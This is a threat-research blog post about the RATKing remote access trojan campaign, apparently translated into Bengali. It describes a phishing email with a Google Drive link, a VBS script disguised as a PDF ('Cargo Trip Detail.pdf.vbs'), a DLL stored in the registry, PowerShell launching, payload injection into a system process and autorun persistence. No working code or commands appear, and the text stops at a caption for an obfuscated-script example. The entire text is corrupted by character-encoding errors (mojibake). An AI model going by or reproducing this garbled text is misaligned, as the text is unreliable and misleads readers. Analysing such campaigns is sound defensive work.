āĻĒā§āĻ°ā§‹āĻšā§‹āĻ¸ā§āĻŸāĻžāĻ° > БĐģĐžĐŗ > āĻĒā§āĻ°āĻļāĻžāĻ¸āĻ¨ > RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨

āĻŽā§‡ āĻŽāĻžāĻ¸ā§‡āĻ° āĻļā§‡āĻˇā§‡āĻ° āĻĻāĻŋāĻ•ā§‡, āĻ†āĻŽāĻ°āĻž āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ (RAT) āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻ•āĻ°āĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻāĻ•āĻŸāĻŋ āĻĒā§āĻ°āĻšāĻžāĻ°āĻžāĻ­āĻŋāĻ¯āĻžāĻ¨ āĻ†āĻŦāĻŋāĻˇā§āĻ•āĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋ—āĻĒā§āĻ°ā§‹āĻ—ā§āĻ°āĻžāĻŽ āĻ¯āĻž āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻĻā§‡āĻ° āĻāĻ•āĻŸāĻŋ āĻ¸āĻ‚āĻ•ā§āĻ°āĻžāĻŽāĻŋāĻ¤ āĻ¸āĻŋāĻ¸ā§āĻŸā§‡āĻŽāĻ•ā§‡ āĻĻā§‚āĻ° āĻĨā§‡āĻ•ā§‡ āĻ¨āĻŋāĻ¯āĻŧāĻ¨ā§āĻ¤ā§āĻ°āĻŖ āĻ•āĻ°āĻ¤ā§‡ āĻĻā§‡āĻ¯āĻŧā§ˇ

āĻ†āĻŽāĻ°āĻž āĻ¯ā§‡ āĻ—ā§‹āĻˇā§āĻ ā§€āĻŸāĻŋ āĻĒāĻ°ā§€āĻ•ā§āĻˇāĻž āĻ•āĻ°ā§‡āĻ›āĻŋ āĻ¤āĻž āĻāĻ‡ āĻ¸āĻ¤ā§āĻ¯ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ†āĻ˛āĻžāĻĻāĻž āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ āĻ¯ā§‡ āĻāĻŸāĻŋ āĻ¸āĻ‚āĻ•ā§āĻ°āĻŽāĻŖā§‡āĻ° āĻœāĻ¨ā§āĻ¯ āĻ•ā§‹āĻ¨āĻ“ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻŸ RAT āĻĒāĻ°āĻŋāĻŦāĻžāĻ° āĻ¨āĻŋāĻ°ā§āĻŦāĻžāĻšāĻ¨ āĻ•āĻ°ā§‡āĻ¨āĻŋāĨ¤ āĻĒā§āĻ°āĻšāĻžāĻ°āĻžāĻ­āĻŋāĻ¯āĻžāĻ¨ā§‡āĻ° āĻŽāĻ§ā§āĻ¯ā§‡ āĻŦā§‡āĻļ āĻ•āĻŋāĻ›ā§ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ†āĻ•ā§āĻ°āĻŽāĻŖā§‡ āĻ˛āĻ•ā§āĻˇā§āĻ¯ āĻ•āĻ°āĻž āĻ—ā§‡āĻ›ā§‡ (āĻ¯āĻžāĻ° āĻ¸āĻŦāĻ—ā§āĻ˛ā§‹āĻ‡ āĻŦā§āĻ¯āĻžāĻĒāĻ•āĻ­āĻžāĻŦā§‡ āĻ‰āĻĒāĻ˛āĻŦā§āĻ§ āĻ›āĻŋāĻ˛)āĨ¤ āĻāĻ‡ āĻŦā§ˆāĻļāĻŋāĻˇā§āĻŸā§āĻ¯ā§‡āĻ° āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ā§‡, āĻĻāĻ˛āĻŸāĻŋ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻ‡āĻāĻĻā§āĻ° āĻ°āĻžāĻœāĻžāĻ° āĻ•āĻĨāĻž āĻŽāĻ¨ā§‡ āĻ•āĻ°āĻŋāĻ¯āĻŧā§‡ āĻĻāĻŋāĻ˛ - āĻāĻ•āĻŸāĻŋ āĻĒā§ŒāĻ°āĻžāĻŖāĻŋāĻ• āĻĒā§āĻ°āĻžāĻŖā§€ āĻ¯āĻž āĻĒāĻ°āĻ¸ā§āĻĒāĻ° āĻ¯ā§āĻ•ā§āĻ¤ āĻ˛ā§‡āĻœ āĻ¸āĻš āĻ‡āĻāĻĻā§āĻ° āĻ¨āĻŋāĻ¯āĻŧā§‡ āĻ—āĻ āĻŋāĻ¤āĨ¤

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻŽā§‚āĻ˛āĻŸāĻŋ āĻ•ā§‡.āĻāĻ¨. āĻ°āĻ¸āĻŋāĻ•āĻ­ā§‡āĻ° āĻŽāĻ¨ā§‹āĻ—ā§āĻ°āĻžāĻĢ āĻĨā§‡āĻ•ā§‡ āĻ¨ā§‡āĻ“āĻ¯āĻŧāĻž āĻšāĻ¯āĻŧā§‡āĻ›ā§‡ "āĻ‡āĻāĻĻā§āĻ° āĻāĻŦāĻ‚ āĻ‡āĻāĻĻā§āĻ°ā§‡āĻ° āĻŽāĻ¤ā§‹ āĻ‡āĻāĻĻā§āĻ°, āĻ…āĻ°ā§āĻĨāĻ¨ā§ˆāĻ¤āĻŋāĻ•āĻ­āĻžāĻŦā§‡ āĻ—ā§āĻ°ā§āĻ¤ā§āĻŦāĻĒā§‚āĻ°ā§āĻŖ" (1908)

āĻāĻ‡ āĻĒā§āĻ°āĻžāĻŖā§€āĻ° āĻ¸āĻŽā§āĻŽāĻžāĻ¨ā§‡, āĻ†āĻŽāĻ°āĻž āĻ¯ā§‡ āĻ—ā§āĻ°ā§āĻĒāĻŸāĻŋāĻ•ā§‡ RATKing āĻŦāĻŋāĻŦā§‡āĻšāĻ¨āĻž āĻ•āĻ°āĻ›āĻŋ āĻ¤āĻžāĻ° āĻ¨āĻžāĻŽ āĻĻāĻŋāĻ¯āĻŧā§‡āĻ›āĻŋāĨ¤ āĻāĻ‡ āĻĒā§‹āĻ¸ā§āĻŸā§‡, āĻ†āĻŽāĻ°āĻž āĻ•ā§€āĻ­āĻžāĻŦā§‡ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻ°āĻž āĻ†āĻ•ā§āĻ°āĻŽāĻŖ āĻšāĻžāĻ˛āĻŋāĻ¯āĻŧā§‡āĻ›ā§‡, āĻ¤āĻžāĻ°āĻž āĻ•ā§€ āĻ•ā§€ āĻ¸āĻ°āĻžā§āĻœāĻžāĻŽ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›ā§‡ āĻ¸ā§‡ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻ•ā§‡ āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤ āĻœāĻžāĻ¨āĻžāĻŦ āĻāĻŦāĻ‚ āĻāĻ‡ āĻĒā§āĻ°āĻšāĻžāĻ°āĻŖāĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻ…ā§āĻ¯āĻžāĻŸā§āĻ°āĻŋāĻŦāĻŋāĻ‰āĻļāĻ¨ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻ•ā§‡ āĻ†āĻŽāĻžāĻĻā§‡āĻ° āĻšāĻŋāĻ¨ā§āĻ¤āĻžāĻ­āĻžāĻŦāĻ¨āĻžāĻ“ āĻļā§‡āĻ¯āĻŧāĻžāĻ° āĻ•āĻ°āĻŦāĨ¤

āĻ†āĻ•ā§āĻ°āĻŽāĻŖā§‡āĻ° āĻ…āĻ—ā§āĻ°āĻ—āĻ¤āĻŋ

āĻāĻ‡ āĻĒā§āĻ°āĻšāĻžāĻ°āĻžāĻ­āĻŋāĻ¯āĻžāĻ¨ā§‡āĻ° āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻ†āĻ•ā§āĻ°āĻŽāĻŖ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻ–āĻŋāĻ¤ āĻ…ā§āĻ¯āĻžāĻ˛āĻ—āĻ°āĻŋāĻĻāĻŽ āĻ…āĻ¨ā§āĻ¯āĻžāĻ¯āĻŧā§€ āĻ¸āĻ‚āĻ˜āĻŸāĻŋāĻ¤ āĻšāĻ¯āĻŧā§‡āĻ›ā§‡:

  1. āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻ•āĻžāĻ°ā§€ Google āĻĄā§āĻ°āĻžāĻ‡āĻ­ā§‡āĻ° āĻāĻ•āĻŸāĻŋ āĻ˛āĻŋāĻ™ā§āĻ• āĻ¸āĻš āĻāĻ•āĻŸāĻŋ āĻĢāĻŋāĻļāĻŋāĻ‚ āĻ‡āĻŽā§‡āĻ˛ āĻĒā§‡āĻ¯āĻŧā§‡āĻ›ā§‡āĻ¨ā§ˇ
  2. āĻ˛āĻŋāĻ™ā§āĻ•āĻŸāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡, āĻļāĻŋāĻ•āĻžāĻ° āĻāĻ•āĻŸāĻŋ āĻĻā§‚āĻˇāĻŋāĻ¤ VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻĄāĻžāĻ‰āĻ¨āĻ˛ā§‹āĻĄ āĻ•āĻ°ā§‡āĻ›ā§‡ āĻ¯āĻž āĻ‰āĻ‡āĻ¨ā§āĻĄā§‹āĻœ āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋāĻ¤ā§‡ āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄ āĻ˛ā§‹āĻĄ āĻ•āĻ°āĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻāĻ•āĻŸāĻŋ DLL āĻ˛āĻžāĻ‡āĻŦā§āĻ°ā§‡āĻ°āĻŋ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻŸ āĻ•āĻ°ā§‡āĻ›ā§‡ āĻāĻŦāĻ‚ āĻāĻŸāĻŋ āĻšāĻžāĻ˛āĻžāĻ¨ā§‹āĻ° āĻœāĻ¨ā§āĻ¯ PowerShell āĻšāĻžāĻ˛ā§ āĻ•āĻ°ā§‡āĻ›ā§‡āĨ¤
  3. DLL āĻ˛āĻžāĻ‡āĻŦā§āĻ°ā§‡āĻ°āĻŋ āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄ āĻ‡āĻ¨āĻœā§‡āĻ•āĻļāĻ¨ āĻ•āĻ°ā§‡āĻ›ā§‡ - āĻ†āĻ¸āĻ˛ā§‡, āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻĻā§‡āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻŦā§āĻ¯āĻŦāĻšā§ƒāĻ¤ RAT āĻ—ā§āĻ˛āĻŋāĻ° āĻŽāĻ§ā§āĻ¯ā§‡ āĻāĻ•āĻŸāĻŋ - āĻ¸āĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¤ā§‡ āĻāĻŦāĻ‚ āĻ¸āĻ‚āĻ•ā§āĻ°āĻžāĻŽāĻŋāĻ¤ āĻŽā§‡āĻļāĻŋāĻ¨ā§‡ āĻĒāĻž āĻ°āĻžāĻ–āĻžāĻ° āĻœāĻ¨ā§āĻ¯ āĻ…āĻŸā§‹āĻ°āĻžāĻ¨ā§‡ āĻāĻ•āĻŸāĻŋ VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§āĻŋāĻ¤ āĻ•āĻ°ā§‡āĻ›ā§‡āĨ¤
  4. āĻšā§‚āĻĄāĻŧāĻžāĻ¨ā§āĻ¤ āĻĒā§‡āĻ˛ā§‹āĻĄāĻŸāĻŋ āĻāĻ•āĻŸāĻŋ āĻ¸āĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¯āĻŧ āĻ•āĻžāĻ°ā§āĻ¯āĻ•āĻ° āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ āĻāĻŦāĻ‚ āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻ•ā§‡ āĻ¸āĻ‚āĻ•ā§āĻ°āĻžāĻŽāĻŋāĻ¤ āĻ•āĻŽā§āĻĒāĻŋāĻ‰āĻŸāĻžāĻ° āĻ¨āĻŋāĻ¯āĻŧāĻ¨ā§āĻ¤ā§āĻ°āĻŖ āĻ•āĻ°āĻžāĻ° āĻ•ā§āĻˇāĻŽāĻ¤āĻž āĻĻāĻŋāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤

āĻĒāĻ°āĻŋāĻ•āĻ˛ā§āĻĒāĻŋāĻ¤āĻ­āĻžāĻŦā§‡ āĻāĻŸāĻŋ āĻāĻ‡ āĻŽāĻ¤ āĻ‰āĻĒāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻ•āĻ°āĻž āĻ¯ā§‡āĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡:

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨

āĻāĻ° āĻĒāĻ°ā§‡, āĻ†āĻŽāĻ°āĻž āĻĒā§āĻ°āĻĨāĻŽ āĻ¤āĻŋāĻ¨āĻŸāĻŋ āĻ§āĻžāĻĒā§‡ āĻĢā§‹āĻ•āĻžāĻ¸ āĻ•āĻ°āĻŦ, āĻ¯ā§‡āĻšā§‡āĻ¤ā§ āĻ†āĻŽāĻ°āĻž āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻĄā§‡āĻ˛āĻŋāĻ­āĻžāĻ°āĻŋ āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ¯āĻŧ āĻ†āĻ—ā§āĻ°āĻšā§€āĨ¤ āĻ†āĻŽāĻ°āĻž āĻŽā§āĻ¯āĻžāĻ˛āĻ“āĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻ¨āĻŋāĻœā§‡āĻ‡ āĻĒāĻ°āĻŋāĻšāĻžāĻ˛āĻ¨āĻžāĻ° āĻĒā§āĻ°āĻ•ā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻŦāĻŋāĻ¸ā§āĻ¤āĻžāĻ°āĻŋāĻ¤āĻ­āĻžāĻŦā§‡ āĻŦāĻ°ā§āĻŖāĻ¨āĻž āĻ•āĻ°āĻŦ āĻ¨āĻžāĨ¤ āĻāĻ—ā§āĻ˛āĻŋ āĻŦā§āĻ¯āĻžāĻĒāĻ•āĻ­āĻžāĻŦā§‡ āĻĒāĻžāĻ“āĻ¯āĻŧāĻž āĻ¯āĻžāĻ¯āĻŧ - āĻšāĻ¯āĻŧ āĻŦāĻŋāĻļā§‡āĻˇ āĻĢā§‹āĻ°āĻžāĻŽā§‡ āĻŦāĻŋāĻ•ā§āĻ°āĻŋ āĻšāĻ¯āĻŧ, āĻŦāĻž āĻāĻŽāĻ¨āĻ•āĻŋ āĻ“āĻĒā§‡āĻ¨ āĻ¸ā§‹āĻ°ā§āĻ¸ āĻĒā§āĻ°āĻ•āĻ˛ā§āĻĒ āĻšāĻŋāĻ¸āĻžāĻŦā§‡ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧ - āĻāĻŦāĻ‚ āĻ¤āĻžāĻ‡ RATKing āĻ—ā§āĻ°ā§āĻĒā§‡āĻ° āĻœāĻ¨ā§āĻ¯ āĻ…āĻ¨āĻ¨ā§āĻ¯ āĻ¨āĻ¯āĻŧāĨ¤

āĻ†āĻ•ā§āĻ°āĻŽāĻŖā§‡āĻ° āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧ āĻŦāĻŋāĻļā§āĻ˛ā§‡āĻˇāĻŖ

āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧ 1. āĻĢāĻŋāĻļāĻŋāĻ‚ āĻ‡āĻŽā§‡āĻ˛

āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻŸāĻŋ āĻļā§āĻ°ā§ āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛ āĻ­āĻŋāĻ•āĻŸāĻŋāĻŽ āĻāĻ•āĻŸāĻŋ āĻĻā§‚āĻˇāĻŋāĻ¤ āĻšāĻŋāĻ āĻŋ āĻĒā§‡āĻ¯āĻŧā§‡ (āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻ°āĻž āĻĒāĻžāĻ ā§āĻ¯ āĻ¸āĻš āĻŦāĻŋāĻ­āĻŋāĻ¨ā§āĻ¨ āĻŸā§‡āĻŽāĻĒā§āĻ˛ā§‡āĻŸ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋāĻ˛; āĻ¨ā§€āĻšā§‡āĻ° āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸāĻŸāĻŋ āĻāĻ•āĻŸāĻŋ āĻ‰āĻĻāĻžāĻšāĻ°āĻŖ āĻĻā§‡āĻ–āĻžāĻ¯āĻŧ)āĨ¤ āĻŦāĻžāĻ°ā§āĻ¤āĻžāĻŸāĻŋāĻ¤ā§‡ āĻāĻ•āĻŸāĻŋ āĻŦā§ˆāĻ§ āĻ¸āĻ‚āĻ—ā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛ā§‡āĻ° āĻāĻ•āĻŸāĻŋ āĻ˛āĻŋāĻ™ā§āĻ• āĻ°āĻ¯āĻŧā§‡āĻ›ā§‡ā§ˇ drive.google.com, āĻ¯āĻž āĻ…āĻ¨ā§āĻŽāĻŋāĻ¤āĻ­āĻžāĻŦā§‡ āĻāĻ•āĻŸāĻŋ āĻĒāĻŋāĻĄāĻŋāĻāĻĢ āĻĄāĻ•ā§āĻŽā§‡āĻ¨ā§āĻŸ āĻĄāĻžāĻ‰āĻ¨āĻ˛ā§‹āĻĄ āĻĒā§ƒāĻˇā§āĻ āĻžāĻ° āĻĻāĻŋāĻ•ā§‡ āĻĒāĻ°āĻŋāĻšāĻžāĻ˛āĻŋāĻ¤ āĻ•āĻ°ā§‡āĻ›āĻŋāĻ˛āĨ¤

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻĢāĻŋāĻļāĻŋāĻ‚ āĻ‡āĻŽā§‡āĻ˛ āĻ‰āĻĻāĻžāĻšāĻ°āĻŖ

āĻ¯āĻžāĻ‡āĻšā§‹āĻ•, āĻ†āĻ¸āĻ˛ā§‡, āĻāĻŸāĻŋ āĻāĻ•āĻŸāĻŋ āĻĒāĻŋāĻĄāĻŋāĻāĻĢ āĻĄāĻ•ā§āĻŽā§‡āĻ¨ā§āĻŸ āĻ›āĻŋāĻ˛ āĻ¨āĻž āĻ¯āĻž āĻŽā§‹āĻŸā§‡āĻ“ āĻ˛ā§‹āĻĄ āĻ•āĻ°āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛, āĻ•āĻŋāĻ¨ā§āĻ¤ā§ āĻāĻ•āĻŸāĻŋ VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ›āĻŋāĻ˛āĨ¤

āĻ‰āĻĒāĻ°ā§‡āĻ° āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻ¨āĻļāĻŸā§‡ āĻ‡āĻŽā§‡āĻ‡āĻ˛ āĻĨā§‡āĻ•ā§‡ āĻ˛āĻŋāĻ‚āĻ•ā§‡ āĻ•ā§āĻ˛āĻŋāĻ• āĻ•āĻ°āĻ˛ā§‡ āĻ¨āĻžāĻŽā§‡āĻ° āĻāĻ•āĻŸāĻŋ āĻĢāĻžāĻ‡āĻ˛ Cargo Flight Details.vbs. āĻāĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡ āĻšāĻžāĻŽāĻ˛āĻžāĻ•āĻžāĻ°ā§€āĻ°āĻž āĻĢāĻžāĻ‡āĻ˛āĻŸāĻŋāĻ•ā§‡ āĻŦā§ˆāĻ§ āĻĻāĻ˛āĻŋāĻ˛ āĻŦāĻ˛ā§‡ āĻ›āĻĻā§āĻŽāĻŦā§‡āĻļ āĻĻā§‡āĻ“āĻ¯āĻŧāĻžāĻ° āĻšā§‡āĻˇā§āĻŸāĻžāĻ“ āĻ•āĻ°ā§‡āĻ¨āĻŋāĨ¤

āĻāĻ•āĻ‡ āĻ¸āĻŽāĻ¯āĻŧā§‡, āĻāĻ‡ āĻĒā§āĻ°āĻšāĻžāĻ°āĻŖāĻžāĻ° āĻ…āĻ‚āĻļ āĻšāĻŋāĻ¸āĻžāĻŦā§‡, āĻ†āĻŽāĻ°āĻž āĻ¨āĻžāĻŽā§‡āĻ° āĻāĻ•āĻŸāĻŋ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ†āĻŦāĻŋāĻˇā§āĻ•āĻžāĻ° āĻ•āĻ°ā§‡āĻ›āĻŋ Cargo Trip Detail.pdf.vbs. āĻāĻŸāĻŋ āĻ‡āĻ¤āĻŋāĻŽāĻ§ā§āĻ¯ā§‡āĻ‡ āĻāĻ•āĻŸāĻŋ āĻŦā§ˆāĻ§ āĻĒāĻŋāĻĄāĻŋāĻāĻĢā§‡āĻ° āĻœāĻ¨ā§āĻ¯ āĻĒāĻžāĻ¸ āĻ•āĻ°āĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡ āĻ•āĻžāĻ°āĻŖ āĻ‰āĻ‡āĻ¨ā§āĻĄā§‹āĻœ āĻĄāĻŋāĻĢāĻ˛ā§āĻŸāĻ°ā§‚āĻĒā§‡ āĻĢāĻžāĻ‡āĻ˛ āĻāĻ•ā§āĻ¸āĻŸā§‡āĻ¨āĻļāĻžāĻ¨āĻ—ā§āĻ˛āĻŋ āĻ˛ā§āĻ•āĻžāĻ¯āĻŧāĨ¤ āĻ¸āĻ¤ā§āĻ¯, āĻāĻ‡ āĻ•ā§āĻˇā§‡āĻ¤ā§āĻ°ā§‡, āĻ¸āĻ¨ā§āĻĻā§‡āĻš āĻāĻ–āĻ¨āĻ“ āĻ¤āĻžāĻ° āĻ†āĻ‡āĻ•āĻ¨ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ‰āĻĻā§āĻ­ā§‚āĻ¤ āĻšāĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡, āĻ¯āĻž VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸā§‡āĻ° āĻ¸āĻžāĻĨā§‡ āĻŽāĻŋāĻ˛ā§‡ āĻ¯āĻžāĻ¯āĻŧāĨ¤

āĻāĻ‡ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§‡, āĻļāĻŋāĻ•āĻžāĻ°āĻŸāĻŋ āĻĒā§āĻ°āĻ¤āĻžāĻ°āĻŖāĻžāĻ•ā§‡ āĻšāĻŋāĻ¨āĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡: āĻĄāĻžāĻ‰āĻ¨āĻ˛ā§‹āĻĄ āĻ•āĻ°āĻž āĻĢāĻžāĻ‡āĻ˛āĻ—ā§āĻ˛āĻŋāĻ•ā§‡ āĻāĻ• āĻ¸ā§‡āĻ•ā§‡āĻ¨ā§āĻĄā§‡āĻ° āĻœāĻ¨ā§āĻ¯ āĻ˜āĻ¨āĻŋāĻˇā§āĻ āĻ­āĻžāĻŦā§‡ āĻĻā§‡āĻ–ā§āĻ¨āĨ¤ āĻ¯āĻžāĻ‡āĻšā§‹āĻ•, āĻāĻ‡ āĻ§āĻ°āĻ¨ā§‡āĻ° āĻĢāĻŋāĻļāĻŋāĻ‚ āĻĒā§āĻ°āĻšāĻžāĻ°āĻžāĻ­āĻŋāĻ¯āĻžāĻ¨ā§‡, āĻ†āĻ•ā§āĻ°āĻŽāĻŖāĻ•āĻžāĻ°ā§€āĻ°āĻž āĻĒā§āĻ°āĻžāĻ¯āĻŧāĻ‡ āĻāĻ•āĻœāĻ¨ āĻ…āĻŽāĻ¨ā§‹āĻ¯ā§‹āĻ—ā§€ āĻŦāĻž āĻ›ā§āĻŸā§‡ āĻ†āĻ¸āĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻ•āĻžāĻ°ā§€āĻ° āĻ‰āĻĒāĻ° āĻ¨āĻŋāĻ°ā§āĻ­āĻ° āĻ•āĻ°ā§‡āĨ¤

āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧ 2. VBS āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ āĻ…āĻĒāĻžāĻ°ā§‡āĻļāĻ¨

āĻ­āĻŋāĻŦāĻŋāĻāĻ¸ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸ, āĻ¯āĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻ•āĻžāĻ°ā§€ āĻ…āĻ¸āĻžāĻŦāĻ§āĻžāĻ¨āĻ¤āĻžāĻŦāĻļāĻ¤ āĻ–ā§āĻ˛āĻ¤ā§‡ āĻĒāĻžāĻ°ā§‡, āĻ‰āĻ‡āĻ¨ā§āĻĄā§‹āĻœ āĻ°ā§‡āĻœāĻŋāĻ¸ā§āĻŸā§āĻ°āĻŋāĻ¤ā§‡ āĻāĻ•āĻŸāĻŋ DLL āĻ˛āĻžāĻ‡āĻŦā§āĻ°ā§‡āĻ°āĻŋ āĻ¨āĻŋāĻŦāĻ¨ā§āĻ§āĻŋāĻ¤ āĻ•āĻ°ā§‡āĻ›ā§‡āĨ¤ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸāĻŸāĻŋ āĻ…āĻ¸ā§āĻĒāĻˇā§āĻŸ āĻ›āĻŋāĻ˛: āĻāĻ¤ā§‡ āĻ˛āĻžāĻ‡āĻ¨āĻ—ā§āĻ˛āĻŋ āĻāĻ•āĻŸāĻŋ āĻ¨āĻŋāĻ°ā§āĻŦāĻŋāĻšāĻžāĻ°ā§‡ āĻ…āĻ•ā§āĻˇāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻŦāĻŋāĻ­āĻ•ā§āĻ¤ āĻŦāĻžāĻ‡āĻŸ āĻšāĻŋāĻ¸āĻžāĻŦā§‡ āĻ˛ā§‡āĻ–āĻž āĻšāĻ¯āĻŧā§‡āĻ›āĻŋāĻ˛āĨ¤

RATKing: āĻ¨āĻ¤ā§āĻ¨ āĻ°āĻŋāĻŽā§‹āĻŸ āĻ…ā§āĻ¯āĻžāĻ•ā§āĻ¸ā§‡āĻ¸ āĻŸā§āĻ°ā§‹āĻœāĻžāĻ¨ āĻ•ā§āĻ¯āĻžāĻŽā§āĻĒā§‡āĻ‡āĻ¨
āĻ…āĻ¸ā§āĻĒāĻˇā§āĻŸ āĻ¸ā§āĻ•ā§āĻ°āĻŋāĻĒā§āĻŸā§‡āĻ° āĻ‰āĻĻāĻžāĻšāĻ°āĻŖ

